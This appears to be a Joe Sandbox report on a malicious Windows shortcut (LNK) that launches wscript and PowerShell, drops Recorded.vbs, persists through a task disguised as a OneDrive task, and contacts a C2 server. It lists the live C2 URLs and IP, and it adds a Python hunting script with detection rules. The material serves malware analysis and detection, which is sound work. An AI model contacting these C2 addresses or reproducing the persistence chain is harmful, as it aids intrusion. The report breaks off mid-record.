Source: Yara match | File source: 00000010.00000002.4521422067.0000010780085000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.4521422067.000001078019C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3417701270.000001DE62CF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 6496, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: wscript.exe PID: 7272, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7332, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: wscript.exe PID: 4796, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 5244, type: MEMORYSTR
Source: Yara match | File source: C:\Users\Public\Libraries\Recorded.vbs, type: DROPPED
MITRE ATT&CK matrix, listed per tactic (column) in the order the report lays the techniques out. The digits in square brackets are the signature-count badges the report shows next to a technique, copied exactly as rendered; techniques without a badge had no matching signature.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
Resource Development: Scripting [111]; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
Execution: Command and Scripting Interpreter [2]; Scheduled Task/Job [1]; Exploitation for Client Execution [1]; PowerShell [4]; Launchd; Scheduled Task; Systemd Timers
Persistence: Scheduled Task/Job [1]; Scripting [111]; DLL Side-Loading [1]; Login Hook; Network Logon Script; RC Scripts; Startup Items
Privilege Escalation: Process Injection [11]; Scheduled Task/Job [1]; DLL Side-Loading [1]; Login Hook; Network Logon Script; RC Scripts; Startup Items
Defense Evasion: Masquerading [11]; Virtualization/Sandbox Evasion [31]; Process Injection [11]; Deobfuscate/Decode Files or Information [1]; Obfuscated Files or Information [1]; Software Packing [1]; DLL Side-Loading [1]
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
Discovery: Security Software Discovery [11]; Process Discovery [11]; Virtualization/Sandbox Evasion [31]; Application Window Discovery [1]; File and Directory Discovery [1]; System Information Discovery [22]; Remote System Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
Command and Control: Encrypted Channel [1]; Non-Standard Port [11]; Ingress Tool Transfer [1]; Non-Application Layer Protocol [2]; Application Layer Protocol [13]; Multiband Communication; Commonly Used Port
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery
Behavior graph (ID 1522697, sample 140AEcuVy7.lnk, start date 30/09/2024, architecture WINDOWS, score 100), written out as the process tree the graph encodes. Indented lines under a process give the DNS lookups, network destinations, dropped files and signatures the graph attaches to it.

Start (140AEcuVy7.lnk)
  DNS: x1.i.lencr.org; bg.microsoft.map.fastly.net
  Signatures: Malicious sample detected (through community Yara rule); Windows shortcut file (LNK) starts blacklisted processes; Multi AV Scanner detection for submitted file; 17 other signatures
  |- wscript.exe
  |    Signatures: Windows shortcut file (LNK) starts blacklisted processes; Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); 3 other signatures
  |    `- powershell.exe
  |         Network: 2.59.222.98, ports 43820, 58056, 58057 (ONEHOSTPLANETUA, Ukraine)
  |         `- conhost.exe
  |- wscript.exe
  |    `- powershell.exe
  |         `- conhost.exe
  |- powershell.exe
  |    Dropped: C:\Users\Public\Libraries\Recorded.vbs (ASCII)
  |    Signatures: Uses schtasks.exe or at.exe to add and modify task schedules; Found suspicious powershell code related to unpacking or dynamic code loading
  |    |- Acrobat.exe
  |    |    `- AcroCEF.exe
  |    |         `- AcroCEF.exe
  |    |              Network: 23.41.168.139:443 (ZAYO-6461US, United States)
  |    |- conhost.exe
  |    `- schtasks.exe
  `- svchost.exe
       Network: 127.0.0.1

Source | Detection | Scanner | Label
140AEcuVy7.lnk | 53% | ReversingLabs | Win32.Trojan.LnkDrop
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
Source | Detection | Scanner | Label
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
http://x1.i.lencr.org/ | 0% | URL Reputation | safe
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
https://go.micro | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
https://nuget.org/nuget.exe | 0% | URL Reputation | safe
https://oneget.orgX | 0% | URL Reputation | safe
https://aka.ms/pscore68 | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
https://oneget.org | 0% | URL Reputation | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
bg.microsoft.map.fastly.net | 199.232.214.172 | true | false | | unknown
x1.i.lencr.org | unknown | unknown | true | | unknown

Name | Malicious | Antivirus Detection | Reputation
http://2.59.222.98:43820/KfngnHbxFHjaucie/page107/upgrade.txt | true | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://2.59.222.98:43820/KfngnHbx | powershell.exe, 00000006.00000002.3417701270.000001DE62CF0000.00000004.00000800.00020000.00000000.sdmp | true | | unknown
http://nuget.org/NuGet.exe | powershell.exe, 00000000.00000002.2091863635.0000026B721E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2091863635.0000026B720AF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2066672979.0000026B6227B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3467819273.000001DE71567000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3467819273.000001DE71424000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3417701270.000001DE62CF0000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0 | powershell.exe, 00000000.00000002.2066672979.0000026B63A25000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://x1.i.lencr.org/ | 2D85F72862B55C4EADD9E66E06947F3D0.8.dr | false | URL Reputation: safe | unknown
http://2.59.222.98:28402/page107 | powershell.exe, 00000010.00000002.4548213654.00000107F8450000.00000004.00000020.00020000.00000000.sdmp, Recorded.vbs.0.dr | true | | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000006.00000002.3417701270.000001DE615DD000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000006.00000002.3417701270.000001DE615DD000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://go.micro | powershell.exe, 00000006.00000002.3417701270.000001DE620D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.4521422067.000001078055F000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/License | powershell.exe, 00000006.00000002.3417701270.000001DE62CF0000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000006.00000002.3417701270.000001DE62CF0000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://crl.ver) | svchost.exe, 00000009.00000002.3748403757.0000027DAD800000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://g.live.com/odclientsettings/ProdV2.C: | svchost.exe, 00000009.00000003.2101982072.0000027DAD750000.00000004.00000800.00020000.00000000.sdmp, edb.log.9.dr, qmgr.db.9.dr | false | | unknown
https://github.com/Pester/Pester | powershell.exe, 00000006.00000002.3417701270.000001DE615DD000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://2.59.222.98:43820( | powershell.exe, 00000006.00000002.3417701270.000001DE62A2A000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://g.live.com/odclientsettings/Prod/C: | edb.log.9.dr, qmgr.db.9.dr | false | | unknown
http://2.59.222.98:28402/page107Bytestf8.GetBytesesX | powershell.exe, 00000010.00000002.4521422067.00000107804D8000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://2.59.222.98:28402/page107X | powershell.exe, 00000010.00000002.4521422067.00000107804D8000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://crl.m1 | powershell.exe, 00000006.00000002.3475796002.000001DE79A90000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://2.59.222.98:43820/KfngnHb | powershell.exe, 00000010.00000002.4521422067.00000107804D8000.00000004.00000800.00020000.00000000.sdmp | true | | unknown
https://contoso.com/ | powershell.exe, 00000006.00000002.3417701270.000001DE62CF0000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000000.00000002.2091863635.0000026B721E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2091863635.0000026B720AF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2066672979.0000026B6227B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3467819273.000001DE71567000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3467819273.000001DE71424000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3417701270.000001DE62CF0000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://2.59.222.98:43820/kfngnhbxfhjaucie/page107/upgrade.txt | powershell.exe, 00000006.00000002.3416550367.000001DE5FA85000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://oneget.orgX | powershell.exe, 00000000.00000002.2066672979.0000026B63A25000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://2.59.222.98:43820 | powershell.exe, 00000006.00000002.3417701270.000001DE62998000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3417701270.000001DE62A22000.00000004.00000800.00020000.00000000.sdmp | true | | unknown
https://aka.ms/pscore68 | powershell.exe, 00000000.00000002.2066672979.0000026B62031000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3417701270.000001DE613B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.4521422067.000001078004B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.4521422067.000001078005E000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000000.00000002.2066672979.0000026B62031000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3417701270.000001DE613B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.4521422067.0000010780085000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://oneget.org | powershell.exe, 00000000.00000002.2066672979.0000026B63A25000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
23.41.168.139 | unknown | United States | 6461 | ZAYO-6461US | false
2.59.222.98 | unknown | Ukraine | 209155 | ONEHOSTPLANETUA | true

Private IP
127.0.0.1
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1522697
Start date and time: 2024-09-30 15:40:20 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 36s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 18
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: 140AEcuVy7.lnk (renamed because the original name is a hash value)
Original Sample Name: 0aa794e54c19dbcd5425405e3678ab9bc98fb7ea787684afb962ee22a1c0ab51.lnk
Detection: MAL
Classification: mal100.troj.expl.evad.winLNK@28/51@1/3
EGA Information: Failed
HCA Information:
                                                  HCA Information:
                                                  • Successful, ratio: 100%
                                                  • Number of executed functions: 5
                                                  • Number of non-executed functions: 0
                                                  Cookbook Comments:
                                                  • Found application associated with file extension: .lnk
                                                  • Override analysis time to 240s for sample based on specific behavior
                                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                  • Excluded IPs from analysis (whitelisted): 184.28.88.176, 18.207.85.246, 107.22.247.231, 34.193.227.236, 54.144.73.197, 172.64.41.3, 162.159.61.3, 184.28.90.27, 2.23.197.184, 199.232.214.172, 2.19.126.149, 2.19.126.143, 23.200.0.33
                                                  • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, fs.microsoft.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, geo2.adobe.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net
                                                  • Execution Graph export aborted for target powershell.exe, PID 6496 because it is empty
                                                  • Execution Graph export aborted for target powershell.exe, PID 7332 because it is empty
                                                  • Not all processes where analyzed, report is missing behavior information
                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                  • VT rate limit hit for: 140AEcuVy7.lnk
Time | Type | Description
09:41:11 | API Interceptor | 256x Sleep call for process: powershell.exe modified
09:41:16 | API Interceptor | 3x Sleep call for process: svchost.exe modified
09:41:26 | API Interceptor | 3x Sleep call for process: AcroCEF.exe modified
15:41:13 | Task Scheduler | Run new task: OneDriveCoreTask-S-1-5-21-5466262771-899953646639-1001 path: C:\Users\Public\Libraries\Recorded.vbs
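The behavior graph and the Task Scheduler event above describe one chain: powershell.exe drops C:\Users\Public\Libraries\Recorded.vbs, schtasks.exe registers a task named OneDriveCoreTask-S-1-5-21-... that runs it, wscript.exe then starts powershell.exe, and that PowerShell talks HTTP to 2.59.222.98 on ports 43820 and 28402. The script below is an added example, not part of the Joe Sandbox report, that turns those observations into hunting rules and runs them over constructed Sysmon-style records (process creation, task registration, network connection). The record field names, the schtasks.exe switches, the process paths, the placeholder command lines (the real ones are not reproduced in this section) and the two benign records at the end are assumptions made for the example.

```python
import ipaddress
import re
from dataclasses import dataclass

# Indicators taken from the report: the C2 address powershell.exe contacted
# (ports 43820, 28402, 58056, 58057 in the graph), the registered task name
# and the dropped script's location under C:\Users\Public.
C2_IPS = {"2.59.222.98"}
TASK_NAME_RE = re.compile(r"^OneDriveCoreTask-S-1-5-21-", re.IGNORECASE)
PUBLIC_VBS_RE = re.compile(r"c:\\users\\public\\\S*?\.vbs", re.IGNORECASE)

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
WEB_PORTS = {80, 443, 8080, 8443}   # ports where HTTP(S) from a shell is at least plausible


@dataclass
class Event:
    """Sysmon-like record; the field names are an assumption of this example."""
    kind: str                  # "process", "task" or "network"
    image: str = ""            # full path of the acting process
    parent_image: str = ""
    command_line: str = ""
    task_name: str = ""
    task_action: str = ""      # what a registered scheduled task executes
    dest_ip: str = ""
    dest_port: int = 0


def _base(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def match_rules(ev: Event) -> list[str]:
    """Names of every hunting rule the event satisfies (empty list if none)."""
    hits = []
    if ev.kind == "process":
        img, parent = _base(ev.image), _base(ev.parent_image)
        # Recorded.vbs was dropped under C:\Users\Public\Libraries and run by wscript.exe
        if img in SCRIPT_HOSTS and PUBLIC_VBS_RE.search(ev.command_line):
            hits.append("script_host_runs_public_vbs")
        # the graph shows wscript.exe -> powershell.exe twice
        if img in POWERSHELL and parent in SCRIPT_HOSTS:
            hits.append("wscript_spawns_powershell")
        # powershell.exe -> schtasks.exe registered the persistence task
        if img == "schtasks.exe" and parent in POWERSHELL and "/create" in ev.command_line.lower():
            hits.append("schtasks_from_powershell")
    elif ev.kind == "task":
        if TASK_NAME_RE.match(ev.task_name) or PUBLIC_VBS_RE.search(ev.task_action):
            hits.append("task_runs_public_vbs")
    elif ev.kind == "network":
        if ev.dest_ip in C2_IPS:
            hits.append("known_c2_ip")
        # HTTP to 2.59.222.98:43820 and :28402: a known protocol on a non-standard port
        if (_base(ev.image) in POWERSHELL and ev.dest_port not in WEB_PORTS
                and not ipaddress.ip_address(ev.dest_ip).is_private):
            hits.append("powershell_nonstandard_port")
    return hits


def hunt(events: list[Event]) -> dict[str, list[int]]:
    """Map each rule name to the indices of the events that fired it."""
    result: dict[str, list[int]] = {}
    for i, ev in enumerate(events):
        for rule in match_rules(ev):
            result.setdefault(rule, []).append(i)
    return result


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SYS32 = r"C:\Windows\System32"

# Constructed records mirroring the chain in the report. Command lines, the
# schtasks switches and the two benign records (7, 8) are made up for the example.
SAMPLE_EVENTS = [
    Event("process", image=PS, parent_image=r"C:\Windows\explorer.exe",
          command_line="powershell.exe"),                                      # 0: started by the LNK
    Event("process", image=SYS32 + r"\schtasks.exe", parent_image=PS,
          command_line=r'schtasks.exe /create /tn OneDriveCoreTask-S-1-5-21-5466262771-899953646639-1001 '
                       r'/tr "wscript.exe C:\Users\Public\Libraries\Recorded.vbs"'),  # 1
    Event("task", task_name="OneDriveCoreTask-S-1-5-21-5466262771-899953646639-1001",
          task_action=r"C:\Users\Public\Libraries\Recorded.vbs"),             # 2
    Event("process", image=SYS32 + r"\wscript.exe", parent_image=SYS32 + r"\svchost.exe",
          command_line=r'wscript.exe "C:\Users\Public\Libraries\Recorded.vbs"'),  # 3
    Event("process", image=PS, parent_image=SYS32 + r"\wscript.exe",
          command_line="powershell.exe"),                                      # 4
    Event("network", image=PS, dest_ip="2.59.222.98", dest_port=43820),        # 5
    Event("network", image=PS, dest_ip="2.59.222.98", dest_port=28402),        # 6
    Event("network", image=r"C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe",
          dest_ip="23.41.168.139", dest_port=443),                            # 7: Acrobat traffic the report rates not malicious
    Event("process", image=SYS32 + r"\wscript.exe", parent_image=r"C:\Windows\explorer.exe",
          command_line=r'wscript.exe "C:\Program Files\Contoso\setup.vbs"'),  # 8: benign script host use
]

if __name__ == "__main__":
    for rule, idx in sorted(hunt(SAMPLE_EVENTS).items()):
        print(f"{rule:32s} events {idx}")
```

The rules are deliberately narrow: script hosts are only flagged when the script lives under C:\Users\Public, and a PowerShell connection is only flagged on a non-web port to a public address, so the Acrobat HTTPS session and the vendor .vbs in Program Files produce no hits while every step of the reported chain produces at least one.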
Context by IP
Match | Associated Sample Name / URL | Detection | Threat Name | Context
23.41.168.139 | XnQmVRj5g0.lnk | malicious | LonePage |
23.41.168.139 | Advisory23-UCDMS04-11-01.pdf.lnk | malicious | Unknown |
23.41.168.139 | Callus+1(814)-310-9943.pdf | malicious | PayPal Phisher |
23.41.168.139 | Steel Dynamics.pdf | malicious | Unknown |
23.41.168.139 | https://seedsmarket.org/ | malicious | HTMLPhisher |
23.41.168.139 | 1445321243TK.pdf | malicious | Unknown |
23.41.168.139 | cho6043ijz.000 | malicious | Unknown |
23.41.168.139 | request_731.pdf | malicious | Unknown |
23.41.168.139 | 5ec990.msi | malicious | Unknown |
23.41.168.139 | https://protect.checkpoint.com/v2/r02/___https:/clicktime.symantec.com/a/1/zPM8RRCBucIOtZGS7nBuCsGPfGeuu7uqRi7wib3E_aY=?d=NFaqzsVnaPxuUzxsp1S8ZNeTdv5RUAvfUpeVYxZKOFi_FaxMV9Y7SVV54XPcAAn6YB9QzZxIDYthMOs47JRBZ_0PV-GDVB9ATG93QO70LP8jR59aDk47QZTQk1MCrc9z0M3DqIE9FBr3JkLMrCK4n5QQgA808-LoV3aL3E5VEqB9qmOwHolNy2exhhpbmurcCABi5zh5uKgLe9rfjkQctCPzCg3AE4fvCR7U11tWATVxiJtbisJBMe_5iBhkTFjew3iq_3GEy8ZmD-34Perc98nMVcfrpi4VxTn2R85qX2fmxz3xMqJlfOHtVdD4mDJYHRlv2yYwpVXDDq31APFUszUTvBvOIHR3Pykkf75nE0oRo-IGsNY6JAjIXdEf9hc703INnKhyaOlaJqzSGk7sTDVPbYStXF2M5bSFRVWbiTwfxF2vjGvw-UOxN6lhQJBYgMpfIk92Omh-tbjm4_bTau0WyFvFbUBrukuGpdg%3D&u=http%3A%2F%2Fwww.globalindustrial.com%2F___.YzJlOmdlcmZsb3JzcGE6YzpvOjVjNDhlMDRlZTQ0YTE0ZTU3OTkxM2M3YTlmYTI1YmE4Ojc6NTQxYTpmMjVhNGFkOWJmNTc4NzRiYWUxZDE4NmIxZWVmYzYzZTI1YWI1YWJhOTNjY2IyMjY3ZjEyMTdhNjg1MjRmZGFkOmg6RjpO | malicious | Unknown |
2.59.222.98 | MSkUffzfPy.hta | malicious | LonePage | 2.59.222.98:43820/SZqGnpRLFQIycdKb/page114/upgrade.txt

Context by domain
Match | Associated Sample Name / URL | Detection | Threat Name | Context
bg.microsoft.map.fastly.net | Purchase Order IBT LPO-2320.eml | malicious | Unknown | 199.232.210.172
bg.microsoft.map.fastly.net | https://timetraveltv.com/actions/cart_update.php?currency=GBP&return_url=https://blog.acelyaokcu.com/m/?c3Y9bzM2NV8xX29uZSZyYW5kPVdrcFNRMHM9JnVpZD1VU0VSMDkwOTIwMjRVMTIwOTA5MDE=N0123N%5BEMAIL | malicious | Unknown | 199.232.214.172
bg.microsoft.map.fastly.net | SCAN_Client_No_XP9739270128398468932393.pdf | malicious | HTMLPhisher | 199.232.214.172
bg.microsoft.map.fastly.net | https://cganet.com/ | malicious | Unknown | 199.232.214.172
bg.microsoft.map.fastly.net | UhkzPftQIt.exe | malicious | ScreenConnect Tool | 199.232.214.172
bg.microsoft.map.fastly.net | 7LC2izrr9u.exe | malicious | ScreenConnect Tool | 199.232.214.172
bg.microsoft.map.fastly.net | UhkzPftQIt.exe | malicious | ScreenConnect Tool | 199.232.214.172
bg.microsoft.map.fastly.net | 7LC2izrr9u.exe | malicious | ScreenConnect Tool | 199.232.214.172
bg.microsoft.map.fastly.net | https://ck.storematch.jp/bc?d=11044D9580EY4W1C2FD019VB3VD27BCW862C0351F9E0EA8-cdlaq4&B=a4f71fd1c235a114f94297e8a0a36c6e&sc_i=shp_pc_promo_mdRMBP_disp_mcad&rd=//interglobalcargoexpress.com/yuuuii#aW5mb0B2b3NzbG9oLmNvbQ== | malicious | HTMLPhisher | 199.232.214.172
bg.microsoft.map.fastly.net | INVOICE DUE..xlsx | malicious | HTMLPhisher | 199.232.214.172

Context by ASN
Match | Associated Sample Name / URL | Detection | Threat Name | Context
ONEHOSTPLANETUA | MSkUffzfPy.hta | malicious | LonePage | 2.59.222.98
ONEHOSTPLANETUA | https://transex.us/ | malicious | Unknown | 2.59.222.121
ONEHOSTPLANETUA | https://transex.us | malicious | Unknown | 2.59.222.121
ONEHOSTPLANETUA | https://www.coimmune.com/ | malicious | Unknown | 2.59.222.122
ONEHOSTPLANETUA | https://www.centralyou.agency/ | malicious | Unknown | 2.59.222.122
ONEHOSTPLANETUA | http://jointcharging.com | malicious | Unknown | 2.59.222.122
ONEHOSTPLANETUA | https://jointcharging.com | malicious | Unknown | 2.59.222.122
ONEHOSTPLANETUA | https://fdhaero.com | malicious | GRQ Scam | 2.59.222.122
ONEHOSTPLANETUA | https://fdhaero.com | malicious | GRQ Scam | 2.59.222.122
ONEHOSTPLANETUA | http://www.starconstructioninc.org/ | malicious | Unknown | 2.59.222.119
ZAYO-6461US | XnQmVRj5g0.lnk | malicious | LonePage | 23.41.168.139
ZAYO-6461US | Advisory23-UCDMS04-11-01.pdf.lnk | malicious | Unknown | 23.41.168.139
ZAYO-6461US | Callus+1(814)-310-9943.pdf | malicious | PayPal Phisher | 23.41.168.139
ZAYO-6461US | Steel Dynamics.pdf | malicious | Unknown | 23.41.168.139
ZAYO-6461US | https://seedsmarket.org/ | malicious | HTMLPhisher | 23.41.168.139
ZAYO-6461US | 1445321243TK.pdf | malicious | Unknown | 23.41.168.139
ZAYO-6461US | cho6043ijz.000 | malicious | Unknown | 23.41.168.139
ZAYO-6461US | request_731.pdf | malicious | Unknown | 23.41.168.139
ZAYO-6461US | 5ec990.msi | malicious | Unknown | 23.41.168.139
ZAYO-6461US | https://protect.checkpoint.com/v2/r02/___https:/clicktime.symantec.com/a/1/zPM8RRCBucIOtZGS7nBuCsGPfGeuu7uqRi7wib3E_aY=?d=NFaqzsVnaPxuUzxsp1S8ZNeTdv5RUAvfUpeVYxZKOFi_FaxMV9Y7SVV54XPcAAn6YB9QzZxIDYthMOs47JRBZ_0PV-GDVB9ATG93QO70LP8jR59aDk47QZTQk1MCrc9z0M3DqIE9FBr3JkLMrCK4n5QQgA808-LoV3aL3E5VEqB9qmOwHolNy2exhhpbmurcCABi5zh5uKgLe9rfjkQctCPzCg3AE4fvCR7U11tWATVxiJtbisJBMe_5iBhkTFjew3iq_3GEy8ZmD-34Perc98nMVcfrpi4VxTn2R85qX2fmxz3xMqJlfOHtVdD4mDJYHRlv2yYwpVXDDq31APFUszUTvBvOIHR3Pykkf75nE0oRo-IGsNY6JAjIXdEf9hc703INnKhyaOlaJqzSGk7sTDVPbYStXF2M5bSFRVWbiTwfxF2vjGvw-UOxN6lhQJBYgMpfIk92Omh-tbjm4_bTau0WyFvFbUBrukuGpdg%3D&u=http%3A%2F%2Fwww.globalindustrial.com%2F___.YzJlOmdlcmZsb3JzcGE6YzpvOjVjNDhlMDRlZTQ0YTE0ZTU3OTkxM2M3YTlmYTI1YmE4Ojc6NTQxYTpmMjVhNGFkOWJmNTc4NzRiYWUxZDE4NmIxZWVmYzYzZTI1YWI1YWJhOTNjY2IyMjY3ZjEyMTdhNjg1MjRmZGFkOmg6RjpO | malicious | Unknown | 23.41.168.139
                                                                      No context
                                                                      No context
Process: C:\Windows\System32\svchost.exe
File Type: data
Category: dropped
Size (bytes): 8192
Entropy (8bit): 0.3588072191296206
Encrypted: false
SSDEEP: 6:6xkoaaD0JOCEfMuaaD0JOCEfMKQmDhxkoaaD0JOCEfMuaaD0JOCEfMKQmD:maaD0JcaaD0JwQQ3aaD0JcaaD0JwQQ
MD5: 663C5D6018506231E334FB3EA962ED1C
SHA1: 539A4641CE92E57E4ADEE32750A817326E596D4C
SHA-256: 066CB701C03237D2612AA647E6BF08EF594360F96E433639B0CC9EED7335F1E1
SHA-512: 5F910653FD1B12B94D314EDEDF6EB2BEC70D369D921EB5B7CF4D199B0374D6C798336E39DBF2781F3B0457280E0DDA63BDF4861DF31C08152544B0F1039D5FCD
Malicious: false
Preview: *.>.................D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Windows\System32\svchost.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):1310720
                                                                      Entropy (8bit):0.8337918564339469
                                                                      Encrypted:false
                                                                      SSDEEP:1536:gJhkM9gB0CnCm0CQ0CESJPB9JbJQfvcso0l1T4MfzzTi1FjIIXYvjbglQdmHDugZ:gJjJGtpTq2yv1AuNZRY3diu8iBVqFz
                                                                      MD5:0E63EA942E7D0C185B0774752F32E8FF
                                                                      SHA1:9D536989316B42E8B072E33E2361ACC59511ADA5
                                                                      SHA-256:35D1AA8B1B797192A6EFF54B0F239E3A3CCE3E70417A2F4F9753DCF0C0E3CD22
                                                                      SHA-512:D2CC868796E2FE10E643271EE5A151D26B122A90A0A40246B2580FE2E67F83A5F2EE92D3C5BF90D77C33E3F64C80DD731CDA50A8D662C5C5A74B8A5D357A2F91
                                                                      Malicious:false
                                                                      Preview:...M........@..@.-...{5..;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................4..........E.[.rXrX.#.........`h.................h.5.......3.....X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
                                                                      Process:C:\Windows\System32\svchost.exe
                                                                      File Type:Extensible storage engine DataBase, version 0x620, checksum 0xfdfa5f68, page size 16384, Windows version 10.0
